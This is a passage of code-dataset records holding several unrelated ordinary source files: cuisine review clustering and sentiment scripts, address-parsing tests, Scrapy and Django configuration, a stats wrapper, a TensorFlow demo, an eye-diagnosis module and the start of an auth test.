sim_matrix[cuisines.index(cat)]\n\t\ti = 0\n\t\tfor i in 
range(len(all_sims)):\n\t\t\tto_write = {}\n\t\t\tto_write['name_x'] = cur_cat\n\t\t\tto_write['name_y'] = new_cat[i]\n\t\t\tto_write['sim'] = all_sims[cuisines.index(new_cat[i])]\n\t\t\tto_write['cluster'] = d[cur_cat]\n\t\t\tif len(clusters) == 0:\n\t\t\t\tto_write['color'] = colors[0]\n\t\t\telse:\n\t\t\t\tcol = colors[clusters[count]] if count >= i else colors[clusters[i]]\n\t\t\t\tto_write['color'] = col #colors[clusters[count]]\n\t\t\tdf = df.append(to_write, ignore_index=True)\n\t\t\ti += 1\n\t\tcount += 1\n\t\tbar.next()\n\tbar.finish()\n\n\tdf.to_csv('sim_matrix_viz.csv')\n\n\ndef similarity():\n\n\tprint(\"Reading cuisines...\")\n\tc_df = pd.read_csv('cuisines.csv')\n\n\tprint(\"----------------------------------------------------------\")\n\n\treviews = []\n\n\tfor i, row_i in c_df.iterrows():\n\t\tcuisine_name = row_i['cuisine_name']\n\n\t\tfilepath = './cuisines/' + cuisine_name + '/reviews_text.txt'\n\n\t\tprint(\"{0}/{1} Processing reviews for: {2}\".format(i + 1, len(c_df.index), cuisine_name))\n\n\t\tif path.exists(filepath):\n\t\t\twith open(filepath) as f:\n\t\t\t\treviews.append(f.read().replace(\"\\n\", \" \"))\n\t\tprint(\"----------------------------------------------------------\")\n\n\n\tif len(reviews) > 0:\n\n\t\tidf = True\n\t\tmax_f = 4000\n\t\tK_clusters = 5\n\n\t\tt0 = time()\n\t\tprint(\"Extracting features from the training dataset using TfidfVectorizer\")\n\n\t\tvectorizer = TfidfVectorizer(min_df=3, max_df=0.5, max_features=max_f, stop_words='english', use_idf=idf)\n\n\t\ttfidf = vectorizer.fit_transform(reviews)\n\t\t\n\t\tprint(\"done in %fs\" % (time() - t0))\n\t\tprint(\"n_samples: %d, n_features: %d\" % tfidf.shape)\n\n\t\tprint('Computing similarity...')\n\n\t\tcosine_similarities = linear_kernel(tfidf, tfidf).flatten()\n\t\tprint(cosine_similarities.shape)\n\n\t\tshape = len(c_df.index)\n\t\tcuisine_matrix = cosine_similarities.reshape((shape, shape))\n\n\t\tprint('Clustering cuisines...')\n\t\t\n\t\tkm = KMeans(n_clusters=5)\n\t\tkm.fit(tfidf)\n\n\t\tclusters = km.labels_.tolist()\n\n\t\titems = {'cluster' : clusters}\n\t\tframe = pd.DataFrame(items, index = [clusters] , columns = ['cluster'])\n\t\tprint(frame['cluster'].value_counts())\n\n\t\twrite_similarity(cuisine_matrix, c_df['cuisine_name'].tolist(), clusters=clusters)\n\n\ndef sentiment_scores(sentence): \n \n\t# Create a SentimentIntensityAnalyzer object. \n\tsid_obj = SentimentIntensityAnalyzer() \n \n\t# polarity_scores method of SentimentIntensityAnalyzer \n\t# oject gives a sentiment dictionary. \n\t# which contains pos, neg, neu, and compound scores. 
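`similarity()` above vectorizes one concatenated review blob per cuisine, takes pairwise similarities with `linear_kernel` (equal to cosine similarity here, because TF-IDF rows are L2-normalized by default), and clusters the same matrix with k-means. The core of that pipeline on toy documents:

```python
from sklearn.cluster import KMeans
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import linear_kernel

docs = ["spicy noodle soup", "noodle broth with dumplings", "grilled steak and fries"]
tfidf = TfidfVectorizer(stop_words="english").fit_transform(docs)

sim = linear_kernel(tfidf, tfidf)               # cosine similarity matrix
labels = KMeans(n_clusters=2, n_init=10).fit_predict(tfidf)
print(sim.round(2))
print(labels)
```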
\n\tsentiment_dict = sid_obj.polarity_scores(sentence)\n\t \n\t# print(\"Overall sentiment dictionary is : \", sentiment_dict) \n\t# print(\"sentence was rated as \", sentiment_dict['neg']*100, \"% Negative\") \n\t# print(\"sentence was rated as \", sentiment_dict['neu']*100, \"% Neutral\") \n\t# print(\"sentence was rated as \", sentiment_dict['pos']*100, \"% Positive\") \n \n\t# print(\"Sentence Overall Rated As\", end = \" \") \n \n\t# decide sentiment as positive, negative and neutral \n\t# if sentiment_dict['compound'] >= 0.05 :\n\t# \tprint(\"Positive\") \n \n\t# elif sentiment_dict['compound'] <= - 0.05 : \n\t# \tprint(\"Negative\") \n \n\t# else : \n\t# \tprint(\"Neutral\")\n\n\treturn sentiment_dict\n\n\ndef sentiment():\n\t\n\tprint(\"Reading cuisines...\")\n\tc_df = pd.read_csv('cuisines.csv')\n\n\tprint(\"----------------------------------------------------------\")\n\n\treviews = []\n\n\tfor i, row_i in c_df.iterrows():\n\t\tcuisine_name = row_i['cuisine_name']\n\n\t\tfilepath = './cuisines/' + cuisine_name + '/reviews.csv'\n\n\t\tprint(\"{0}/{1} Processing reviews for: {2}\".format(i + 1, len(c_df.index), cuisine_name))\n\n\t\tif path.exists(filepath):\n\t\t\trev_df = pd.read_csv(filepath)\n\n\t\t\tdata = {\n\t\t\t'sentiment_positive' : [],\n\t\t\t'sentiment_neutral' : [],\n\t\t\t'sentiment_negative' : [],\n\t\t\t'sentiment_compound' : [],\n\t\t\t}\n\n\t\t\tfor j, row_j in rev_df.iterrows():\n\t\t\t\ts = sentiment_scores(row_j['text'])\n\t\t\t\tdata['sentiment_positive'].append(s['pos'])\n\t\t\t\tdata['sentiment_neutral'].append(s['neu'])\n\t\t\t\tdata['sentiment_negative'].append(s['neg'])\n\t\t\t\tdata['sentiment_compound'].append(s['compound'])\n\n\t\t\trev_df['sentiment_positive'] = data['sentiment_positive']\n\t\t\trev_df['sentiment_neutral'] = data['sentiment_neutral']\n\t\t\trev_df['sentiment_negative'] = data['sentiment_negative']\n\t\t\trev_df['sentiment_compound'] = data['sentiment_compound']\n\n\t\t\trev_df.to_csv(filepath, index=False)\n\n\t\tprint(\"----------------------------------------------------------\")\n\n\ndef ratings_over_time():\n\t\n\tprint(\"Reading cuisines...\")\n\tdf = pd.read_csv(\"./cuisines.csv\")\n\n\tprint(\"----------------------------------------------------------\")\n\t\n\tfor i, row in df.iterrows():\n\t\t\n\t\tcuisine_name = row[\"cuisine_name\"]\n\t\tfilepath = \"./cuisines/\" + cuisine_name + \"/reviews.csv\"\n\n\t\tif path.exists(filepath):\n\n\t\t\tprint(\"{0}/{1} Sorting reviews for: {2}\".format(i + 1, len(df.index), cuisine_name))\n\n\t\t\trev_df = pd.read_csv(filepath)\n\t\t\tnew_df = rev_df.sort_values(by=['iso_date'], ascending=True)\n\n\t\t\tnew_df = new_df.loc[:, ['date','iso_date', 'stars']]\n\t\t\tnew_df = new_df.rename(columns={\"stars\": \"value\"})\n\n\t\t\twrite_path = \"./cuisines/\" + cuisine_name + \"/ratings_over_time.csv\"\n\t\t\tnew_df.to_csv(write_path, index=False)\n\n\n\t\tprint(\"----------------------------------------------------------\")\n\n\ndef users_to_csv(inputPath=RAW_USER_PATH, outputPath=\"./users.csv\"):\n\t\n\twith open(inputPath) as f:\n\t\tall_lines = f.readlines()\n\t\tbar = ChargingBar('Writing users', max=len(all_lines), suffix='%(index)d / %(max)d | %(percent)d%%')\n\n\t\tto_write = {\n\t\t\t\"user_id\" : [],\n\t\t\t\"name\" : [],\n\t\t}\n\n\t\tfor line in all_lines:\n\t\t\td = json.loads(line)\n\t\t\tto_write[\"user_id\"].append(d[\"user_id\"])\n\t\t\tto_write[\"name\"].append(d[\"name\"])\n\t\t\t# new_df = new_df.append(to_write, 
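`sentiment_scores` above wraps VADER's `SentimentIntensityAnalyzer`; each review gets `pos`/`neu`/`neg` fractions plus a `compound` score in [-1, 1]. Minimal usage, assuming the `vaderSentiment` package since the record's import lines fall outside this excerpt:

```python
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer

sid = SentimentIntensityAnalyzer()
scores = sid.polarity_scores("The food was amazing but the service was painfully slow.")
print(scores)  # e.g. {'neg': ..., 'neu': ..., 'pos': ..., 'compound': ...}
```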
ignore_index=True)\n\t\t\tbar.next()\n\t\tbar.finish()\n\n\tnew_df = pd.DataFrame(to_write, columns=[\"user_id\", \"name\"])\n\n\tnew_df.to_csv(outputPath, index=False)\n\n\ndef users():\n\t\n\t# print(\"Writing users to CSV...\")\n\t# users_to_csv()\n\n\tprint(\"Reading cuisines...\")\n\tdf = pd.read_csv(\"./cuisines.csv\")\n\n\tprint(\"----------------------------------------------------------\")\n\n\tprint(\"Reading users...\")\n\tall_users_df = pd.read_csv(\"./users.csv\")\n\n\tprint(\"----------------------------------------------------------\")\n\t\n\tfor i, row in df.iterrows():\n\t\t\n\t\tcuisine_name = row[\"cuisine_name\"]\n\t\tfilepath = \"./cuisines/\" + cuisine_name + \"/reviews.csv\"\n\n\t\tif path.exists(filepath):\n\n\t\t\tprint(\"{0}/{1} Finding users for: {2}\".format(i + 1, len(df.index), cuisine_name))\n\n\t\t\trev_df = pd.read_csv(filepath)\n\n\t\t\tunique_users = rev_df['user_id'].tolist()\n\n\t\t\tcuisine_users = all_users_df.loc[all_users_df.user_id.isin(unique_users)]\n\n\t\t\tif len(cuisine_users.index) > 0:\n\t\t\t\twrite_path = \"./cuisines/\" + cuisine_name + \"/users.csv\"\n\t\t\t\tcuisine_users.to_csv(write_path, index=False)\n\n\t\tprint(\"----------------------------------------------------------\")\n\n\n\ndef main():\n\t# Next\n\t# 1. Find Similarity \n\t# 2. Find Dishes\n\t# 3. Find sentiment rating\n\t# 4. Distribute reviews\n\t# 5. checkin\n\t# 6. tips\n\tpass\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"reviews.py","file_name":"reviews.py","file_ext":"py","file_size_in_byte":15869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"136490104","text":"import json\n\nimport pytest\n\nfrom addok.batch import process_documents\nfrom addok.core import search, Result\nfrom addok.ds import get_document\nfrom addok.helpers.text import Token\nfrom addok_luxemburg.utils import (clean_query, extract_address, flag_housenumber,\n fold_ordinal, glue_ordinal, make_labels,\n remove_leading_zeros)\n\n\n@pytest.mark.parametrize(\"input,expected\", [\n (\"283, route d'Arlon L-1150 Luxembourg\",\n \"283 route d'Arlon L-1150 Luxembourg\"),\n (\"2 Arelerstrooss L-8552 Oberpallen (Uewerpallen)\",\n \"2 Arelerstrooss L-8552 Oberpallen (Uewerpallen)\"),\n])\ndef test_clean_query(input, expected):\n assert clean_query(input) == expected\n\n\n@pytest.mark.parametrize(\"input,expected\", [\n (\"Société MJM BP 1234 L-9874 REMICH\",\n \"L-9874 REMICH\"),\n ('Monsieur Jean Mustermann 71, route du Vin L-1234 DUDELANGE',\n '71 route du Vin L-1234 DUDELANGE'),\n])\ndef test_extract_address(input, expected):\n assert extract_address(input) == expected\n\n\n@pytest.mark.parametrize(\"inputs,expected\", [\n (['6', 'bis'], ['6bis']),\n (['6'], ['6']),\n (['6', 'avenue'], ['6', 'avenue']),\n (['60', 'bis', 'avenue'], ['60bis', 'avenue']),\n (['600', 'ter', 'avenue'], ['600ter', 'avenue']),\n (['6', 'quinquies', 'avenue'], ['6quinquies', 'avenue']),\n (['60', 'sexies', 'avenue'], ['60sexies', 'avenue']),\n (['600', 'quater', 'avenue'], ['600quater', 'avenue']),\n (['6', 's', 'avenue'], ['6s', 'avenue']),\n (['60b', 'avenue'], ['60b', 'avenue']),\n (['600', 'b', 'avenue'], ['600b', 'avenue']),\n (['241', 'r', 'de'], ['241', 'r', 'de']),\n (['120', 'r', 'renard'], ['120', 'r', 'renard']),\n (['241', 'r', 'rue'], ['241r', 'rue']),\n (['place', 'des', 'terreaux'], ['place', 'des', 'terreaux']),\n (['rue', 'du', 'bis'], ['rue', 'du', 'bis']),\n])\ndef test_glue_ordinal(inputs, expected):\n tokens = [Token(input_) for input_ in 
inputs]\n assert list(glue_ordinal(tokens)) == expected\n\n\n@pytest.mark.parametrize(\"inputs,expected\", [\n (['6b'], True),\n (['6'], True),\n (['9303'], True),\n (['93031'], False), # postcode\n (['6', 'avenue'], True),\n (['60b', 'avenue'], True),\n (['600t', 'avenue'], True),\n (['6c', 'avenue'], True),\n (['60s', 'avenue'], True),\n (['600q', 'avenue'], True),\n (['6s', 'avenue'], True),\n (['60b', 'avenue'], True),\n (['600b', 'avenue'], True),\n (['241', 'r', 'de'], True),\n (['241r', 'rue'], True),\n (['place', 'des', 'terreaux'], False),\n (['rue', 'du', 'bis'], False),\n (['9', 'grand', 'rue'], True),\n])\ndef test_flag_housenumber(inputs, expected):\n tokens = [Token(input_) for input_ in inputs]\n tokens = list(flag_housenumber(tokens))\n assert tokens == inputs\n assert (tokens[0].kind == 'housenumber') == expected\n\n\n@pytest.mark.parametrize(\"input,expected\", [\n ('60bis', '60b'),\n ('60BIS', '60b'),\n ('60ter', '60t'),\n ('4terre', '4terre'),\n ('60quater', '60q'),\n ('60 bis', '60 bis'),\n ('bis', 'bis'),\n])\ndef test_fold_ordinal(input, expected):\n assert fold_ordinal(Token(input)) == expected\n\n\n@pytest.mark.parametrize(\"input,expected\", [\n ('03', '3'),\n ('00009', '9'),\n ('02230', '02230'), # Do not affect postcodes.\n ('0', '0'),\n])\ndef test_remove_leading_zeros(input, expected):\n assert remove_leading_zeros(input) == expected\n\n\ndef test_index_housenumbers_use_processors(config):\n doc = {\n 'id': 'xxxx',\n '_id': 'yyyy',\n 'type': 'street',\n 'name': 'rue des Lilas',\n 'city': 'Paris',\n 'lat': '49.32545',\n 'lon': '4.2565',\n 'housenumbers': {\n '1 bis': {\n 'lat': '48.325451',\n 'lon': '2.25651'\n }\n }\n }\n process_documents(json.dumps(doc))\n stored = get_document('d|yyyy')\n assert stored['housenumbers']['1b']['raw'] == '1 bis'\n\n\n@pytest.mark.parametrize(\"input,expected\", [\n ('rue du 8 mai troyes', False),\n ('8 rue du 8 mai troyes', '8'),\n ('3 rue du 8 mai troyes', '3'),\n ('3 bis rue du 8 mai troyes', '3 bis'),\n ('3 bis r du 8 mai troyes', '3 bis'),\n ('3bis r du 8 mai troyes', '3 bis'),\n])\ndef test_match_housenumber(input, expected):\n doc = {\n 'id': 'xxxx',\n '_id': 'yyyy',\n 'type': 'street',\n 'name': 'rue du 8 Mai',\n 'city': 'Troyes',\n 'lat': '49.32545',\n 'lon': '4.2565',\n 'housenumbers': {\n '3': {\n 'lat': '48.325451',\n 'lon': '2.25651'\n },\n '3 bis': {\n 'lat': '48.325451',\n 'lon': '2.25651'\n },\n '8': {\n 'lat': '48.325451',\n 'lon': '2.25651'\n },\n }\n }\n process_documents(json.dumps(doc))\n result = search(input)[0]\n assert (result.type == 'housenumber') == bool(expected)\n if expected:\n assert result.housenumber == expected\n\n\ndef test_match_housenumber_with_multiple_tokens(config):\n config.SYNONYMS = {'18': 'dix huit'}\n doc = {\n 'id': 'xxxx',\n '_id': 'yyyy',\n 'type': 'street',\n 'name': 'rue du 8 Mai',\n 'city': 'Troyes',\n 'lat': '49.32545',\n 'lon': '4.2565',\n 'housenumbers': {\n '8': {\n 'lat': '48.8',\n 'lon': '2.25651'\n },\n '10': {\n 'lat': '48.10',\n 'lon': '2.25651'\n },\n '18': {\n 'lat': '48.18',\n 'lon': '2.25651'\n },\n }\n }\n process_documents(json.dumps(doc))\n result = search('8 rue du 8 mai')[0]\n assert result.housenumber == '8'\n assert result.lat == '48.8'\n result = search('10 rue du 8 mai')[0]\n assert result.housenumber == '10'\n assert result.lat == '48.10'\n result = search('18 rue du 8 mai')[0]\n assert result.housenumber == '18'\n assert result.lat == '48.18'\n\n\ndef test_make_labels(config):\n doc = {\n 'id': 'xxxx',\n '_id': 'yyyy',\n 'type': 'street',\n 'name': 'rue 
des Lilas',\n 'city': 'Paris',\n 'postcode': '75010',\n 'lat': '49.32545',\n 'lon': '4.2565',\n 'housenumbers': {\n '1 bis': {\n 'lat': '48.325451',\n 'lon': '2.25651'\n }\n }\n }\n process_documents(json.dumps(doc))\n result = Result(get_document('d|yyyy'))\n result.housenumber = '1 bis' # Simulate match_housenumber\n make_labels(None, result)\n assert result.labels == [\n '1 bis rue des Lilas 75010 Paris',\n 'rue des Lilas 75010 Paris',\n '1 bis rue des Lilas 75010',\n 'rue des Lilas 75010',\n '1 bis rue des Lilas Paris',\n 'rue des Lilas Paris',\n '1 bis rue des Lilas',\n 'rue des Lilas'\n ]\n\n\ndef test_make_municipality_labels(config):\n doc = {\n 'id': 'xxxx',\n '_id': 'yyyy',\n 'type': 'municipality',\n 'name': 'Lille',\n 'city': 'Lille',\n 'postcode': '59000',\n 'lat': '49.32545',\n 'lon': '4.2565',\n }\n process_documents(json.dumps(doc))\n result = Result(get_document('d|yyyy'))\n make_labels(None, result)\n assert result.labels == [\n 'Lille',\n '59000 Lille',\n 'Lille 59000',\n ]\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":7361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"494652649","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for ecommerce project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. You can find more settings consulting the documentation:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'ecommerce'\n\nSPIDER_MODULES = ['ecommerce.spiders']\nNEWSPIDER_MODULE = 'ecommerce.spiders'\n\n\nROBOTSTXT_OBEY = True\n\nITEM_PIPELINES = ['ecommerce.pipelines.MongoDBPipeline']\n\nMONGODB_SERVER = \"localhost\"\nMONGODB_PORT = 27017\nMONGODB_DB = \"ecommerce_data\" # NAME of database in MONGO_DB\n\nMONGODB_COLLECTION = \"rokomari1\"\n#MONGODB_COLLECTION = \"ecommerce_product_collection\"\n\nITEM_PIPELINES = {\n #'stack.pipelines.StackPipeline': 300,\n 'ecommerce.pipelines.MongoDBPipeline': 300,\n}\n\nDOWNLOAD_FAIL_ON_DATALOSS = False","sub_path":"MAIN FILES/ecommerce_sample - Latest_Main(09_12_17) - Copy/ecommerce/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"541170069","text":"import json\nimport logging\n\nfrom sqlalchemy import func\n\nfrom backend.blueprints.spa_api.errors.errors import CalculatedError\nfrom backend.database.objects import PlayerGame\nfrom backend.database.wrapper.query_filter_builder import QueryFilterBuilder\nfrom backend.database.wrapper.rank_wrapper import get_rank_number\nfrom backend.database.wrapper.stats.shared_stats_wrapper import SharedStatsWrapper\nfrom backend.utils.checks import ignore_filtering, is_local_dev\n\nlogger = logging.getLogger(__name__)\n\n\nclass GlobalStatWrapper(SharedStatsWrapper):\n \"\"\"\n A database wrapper for global stats. 
Acts additionally on global stats in addition to player stats\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n # this Object needs to be pooled per a session so only one is used at a time\n self.base_query = QueryFilterBuilder().with_relative_start_time(days_ago=self.get_timeframe()).with_team_size(\n 3).with_safe_checking().sticky()\n\n def get_global_stats(self, sess, with_rank=True):\n \"\"\"\n :return: A list of stats by rank for every field.\n \"\"\"\n results = {}\n if with_rank:\n ranks = list(range(20))\n else:\n ranks = [0]\n\n def float_maybe(f):\n if f is None:\n return None\n else:\n return float(f)\n\n for column, q in zip(self.stat_list, self.stats_query):\n column_results = []\n # set the column result\n self.base_query.clean().with_stat_query([PlayerGame.player, q.label('avg')])\n for rank in ranks:\n query = self.base_query\n if with_rank:\n query = query.with_rank(rank)\n query = query.build_query(sess)\n query = query.group_by(PlayerGame.player)\n if ignore_filtering():\n query = query.subquery()\n else:\n query = query.filter(PlayerGame.game != \"\").filter(PlayerGame.time_in_game > 0).having(\n func.count(PlayerGame.player) > 5).subquery()\n\n result = sess.query(func.avg(query.c.avg), func.stddev_samp(query.c.avg)).first()\n column_results.append({'mean': float_maybe(result[0]), 'std': float_maybe(result[1])})\n results[column.get_field_name()] = column_results\n return results\n\n def get_global_stats_by_rank(self, session, query_filter: QueryFilterBuilder, stats_query, stds_query,\n player_rank=None, redis=None, ids=None):\n \"\"\"\n Returns the global stats based on the rank of a player.\n\n Does modify the query_filter only setting rank.\n :param session: Session\n :param query_filter: a query filter.\n :param stats_query: A list of global stats\n :param stds_query: A list of global stats for standard deviations\n :param player_rank: The player that stats are associated with. 
Uses unranked if rank is not found\n :param redis: The local cache\n :return:\n \"\"\"\n\n if ids is None:\n # Set the correct rank index\n if player_rank is not None:\n if isinstance(player_rank, list):\n rank_index = get_rank_number(player_rank)\n else:\n rank_index = player_rank\n else:\n rank_index = 0\n\n # Check to see if we have redis available (it usually is)\n if redis is not None:\n stat_string = redis.get('global_stats')\n # Check to see if the key exists and if so load it\n if stat_string is not None:\n stats_dict = json.loads(stat_string)\n global_stats = [stats_dict[stat.get_field_name()][rank_index]['mean'] for stat in self.stat_list]\n global_stds = [stats_dict[stat.get_field_name()][rank_index]['std'] for stat in self.stat_list]\n return global_stats, global_stds\n if is_local_dev():\n rank_index = 0\n stats = self.get_global_stats(session, with_rank=False)\n global_stats = [stats[stat.get_field_name()][rank_index]['mean'] for stat in self.stat_list]\n global_stds = [stats[stat.get_field_name()][rank_index]['std'] for stat in self.stat_list]\n return global_stats, global_stds\n raise CalculatedError(500, \"Global stats unavailable or have not been calculated yet.\")\n else:\n query_filter.clean().with_replay_ids(ids)\n return (query_filter.with_stat_query(stats_query).build_query(session).first(),\n query_filter.with_stat_query(stds_query).build_query(session).first())\n\n @staticmethod\n def get_timeframe():\n \"\"\"Returns the number of days we accept old stats\"\"\"\n try:\n from flask import current_app\n return current_app.config['STAT_DAY_LIMIT']\n except:\n return 30 * 6\n\n\nif __name__ == '__main__':\n from backend.database.startup import startup\n\n engine, Session = startup()\n sess = Session()\n try:\n result = GlobalStatWrapper().get_global_stats(sess)\n print(result)\n except KeyboardInterrupt:\n sess.close()\n finally: # result = engine.execute()\n sess.close()\n","sub_path":"backend/database/wrapper/stats/global_stats_wrapper.py","file_name":"global_stats_wrapper.py","file_ext":"py","file_size_in_byte":5394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"40138236","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/5/30 13:47\n# @Author : ZengC\n# @Email : njuzengc@foxmail.com\n# @File : Demo.py\n# @Software: PyCharm Community Edition\n\nimport numpy as np\nimport tensorflow as tf\n\ndef generate():\n x_data = np.linspace(-1,1,300)[:,np.newaxis]\n noise = np.random.normal(0, 0.05, x_data.shape)\n y_data = np.square(x_data) - 0.5 + noise\n return x_data,y_data\n\ndef add_layer(inputs, in_size, out_size, activation_function=None):\n weights = tf.Variable(tf.random_normal([in_size,out_size]))\n\n biases = tf.Variable(tf.zeros([1, out_size]) + 0.1)\n\n\n Wx_plus_b = tf.matmul(inputs, weights) + biases\n if activation_function is None:\n outputs = Wx_plus_b\n else:\n outputs = activation_function(Wx_plus_b)\n return outputs\n\nif __name__ == '__main__':\n x_data,y_data = generate()\n xs = tf.placeholder(tf.float32, [None, 1],)\n ys = tf.placeholder(tf.float32, [None, 1])\n h1 = add_layer(xs,1,20,activation_function=tf.nn.relu)\n prediction = add_layer(h1,20,1,None)\n\n loss = tf.reduce_mean(tf.reduce_sum(tf.square(ys - prediction),reduction_indices=[1]))\n train_step = tf.train.GradientDescentOptimizer(0.05).minimize(loss)\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n for i in range(2000):\n sess.run(train_step,feed_dict={xs:x_data,ys:y_data})\n if i%100 == 0:\n 
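# every 100 training steps, evaluate the MSE loss on the full data set and print it\n 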
print(sess.run(loss, feed_dict={xs: x_data, ys: y_data}))","sub_path":"Demo.py","file_name":"Demo.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"186058221","text":"from django.contrib import admin\n\nfrom .models import Category, Room, Plant\n\n\nclass CategoryAdmin(admin.ModelAdmin):\n ordering = [\"slug\"]\n search_fields = [\"name\", \"slug\"]\n list_display = [\n \"name\",\n \"slug\",\n ]\n\n\nclass RoomAdmin(admin.ModelAdmin):\n ordering = [\"name\"]\n search_fields = [\"name\"]\n list_display = [\n \"name\",\n \"exposure\",\n \"temperature\",\n \"humidity\",\n \"draft\",\n ]\n\n\nclass PlantAdmin(admin.ModelAdmin):\n ordering = [\"room\", \"name\"]\n search_fields = [\"name\"]\n list_display = [\n \"name\",\n \"category\",\n \"room\",\n \"watering_interval\",\n \"fertilizing_interval\",\n \"last_watered\",\n \"last_fertilized\",\n \"required_exposure\",\n \"required_temperature\",\n \"required_humidity\",\n \"blooming\",\n \"difficulty\",\n ]\n\n list_filter = [\n \"category\",\n \"room\",\n \"blooming\",\n \"difficulty\",\n ]\n list_select_related = True\n\n autocomplete_fields = [\"category\", \"room\"]\n\n\nadmin.site.register(Category, CategoryAdmin)\nadmin.site.register(Room, RoomAdmin)\nadmin.site.register(Plant, PlantAdmin)\n","sub_path":"07_DRF/plants/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"652830777","text":"class Solution:\r\n def convert(self, s: str, numRows: int) -> str:\r\n res = []\r\n \r\n if numRows == 1:\r\n return s\r\n \r\n cycle_len = 2 * numRows - 2\r\n for i in range(numRows):\r\n for j in range(0, len(s) - i, cycle_len):\r\n res.append(s[i + j])\r\n # Middle rows\r\n if (i != 0 and i != numRows - 1 and j + cycle_len - i < len(s)):\r\n res.append(s[cycle_len - i + j])\r\n \r\n return \"\".join(res)\r\n","sub_path":"solutions/6-zigzag-conversion/zigzag-conversion.py","file_name":"zigzag-conversion.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"91745650","text":"#!/usr/local/bin/python3\n\nimport math\nfrom pysig import *\n\nsig = DC(0,duration=0.0)\n\nmod = Div(Sine(2000),20)\n\n#for x in range(10):\nfor ss in range(10):\n\tnsig = Add(DC((ss-5)/10,duration=0.01),mod)\n\tsig = Cat(sig,nsig)\nfor sd in range(10):\n\tss= 10 - sd\n\tnsig = Add(DC((ss-5)/10,duration=0.01),mod)\n\tsig = Cat(sig,nsig)\n\n\n\nwrite(sig,sps=22050,name=\"stairs.wav\")","sub_path":"square_stairs.py","file_name":"square_stairs.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"445795096","text":"import pandas as pd\nimport os\nimport io \nimport cv2\nimport numpy as np\nfrom keras.models import load_model\nfrom .detector.face_detector import MTCNNFaceDetector\n#from detector import face_detector\nimport tensorflow as tf\n\n\nclass Diagnose():\n def __init__(self):\n pass\n\n \n def Image_croping(self , image , detect_model_path):\n \"\"\" return left eye and right eye image cropped\"\"\"\n ## loading wieghts\n fd = MTCNNFaceDetector(sess=tf.compat.v1.keras.backend.get_session(), model_path= detect_model_path) # loading face detection model\n face, lms = fd.detect_face(image) # detect the number of faces \n if len(face) == 1 : \n left_eye_im, right_eye_im = 
fd.cropImage(image,lms)\n return left_eye_im , right_eye_im , face\n if len(face) > 1 :\n return 'Multiple faces detected' , 'Multiple faces detected' , face\n return 'No face detected' , 'No face detected' , face\n\n\n def Eyes_diagnosis(self, left_eye_im , right_eye_im , diagnosis_model_path):\n\n \"\"\" return description and probability of disease for each eye\"\"\"\n diagnosis_model_path = os.path.join(os.path.dirname(__file__), diagnosis_model_path)\n model = load_model(diagnosis_model_path) # load disease detection model \n ############################# left eye #############################\n left_eye_im = cv2.resize(left_eye_im, (100, 100)) \n left_eye_im = left_eye_im.reshape(1 ,100 , 100 , -1)\n\n left_eye_im_diagnosis = model.predict(left_eye_im)\n\n if left_eye_im_diagnosis > 0.56:\n left_eye_im_desc = ' Left Eye : Cataract detected'\n else :\n left_eye_im_desc = 'Left Eye : No Cataract detected'\n\n\n ############################# right eye #############################\n right_eye_im = cv2.resize(right_eye_im, (100, 100))\n right_eye_im = right_eye_im.reshape(1 ,100 , 100 , -1)\n right_eye_im_diagnosis = model.predict(right_eye_im)\n\n if right_eye_im_diagnosis > 0.56:\n right_eye_im_desc = 'Right Eye : Cataract detected'\n else :\n right_eye_im_desc = 'Right Eye : No Cataract detected'\n\n return left_eye_im_desc ,left_eye_im_diagnosis[0], right_eye_im_desc , right_eye_im_diagnosis[0]\n\n def Diagnose_patient(self , image , detect_model_path , diagnosis_model_path):\n \n \"\"\" return croped eye image, diagnosis descripition and probability for both eyes ( 6 output items) \"\"\"\n \n left_eye_im , right_eye_im , face = self.Image_croping(image , detect_model_path) # crop eyes & ensure image is good for diagnosis\n\n if len(face) != 1 :\n return left_eye_im , left_eye_im, left_eye_im , left_eye_im , left_eye_im , left_eye_im \n\n left_eye_im_desc ,left_eye_im_diagnosis, right_eye_im_desc , right_eye_im_diagnosis = self.Eyes_diagnosis(left_eye_im , right_eye_im , diagnosis_model_path) # diagnosis \n\n return left_eye_im , left_eye_im_desc , left_eye_im_diagnosis , right_eye_im , right_eye_im_desc , right_eye_im_diagnosis\n","sub_path":"build/lib/GazeML_keras/diagnose.py","file_name":"diagnose.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"472914078","text":"import json\nimport unittest\n\nimport mock\n\nfrom service.app import create_app\nfrom service.auth import encode_auth_token\nfrom service.database import empty_db\n\n\nclass TestAuth(unittest.TestCase):\n\n def test0(self):\n user_id = 1\n # create token\n new_token = encode_auth_token(user_id)\n\n _app = create_app(debug=True)\n empty_db(_app)\n with _app.test_client() as 